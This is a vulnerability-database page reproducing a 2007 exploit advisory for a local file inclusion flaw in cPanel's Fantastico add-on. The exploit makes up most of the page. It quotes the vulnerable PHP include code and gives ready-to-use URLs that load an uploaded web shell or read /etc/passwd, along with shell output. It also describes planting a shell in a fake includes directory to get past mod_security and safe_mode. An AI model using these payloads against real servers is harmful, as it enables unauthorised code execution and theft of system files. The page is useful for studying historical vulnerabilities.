Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

cPanel 10.9.x - 'Fantastico' Local File Inclusion

🗓️ 11 Mar 2007 00:00:00Reported by cyb3rt & 020Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 65 Views

cPanel 10.9.x Fantastico Local File Inclusion vulnerability & exploitatio

Code
##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE



Vulnerable Code ( 1  ) :
 if(is_file($userlanguage))
   {
       include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php



Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
       {
       include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php       D:

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



###################################################


Discoverd By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###################################################

# milw0rm.com [2007-03-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4
cpanelfantasticolocal file inclusionexploitmod_securitysafe_modevulnerable codeusernamepasswordlogin
65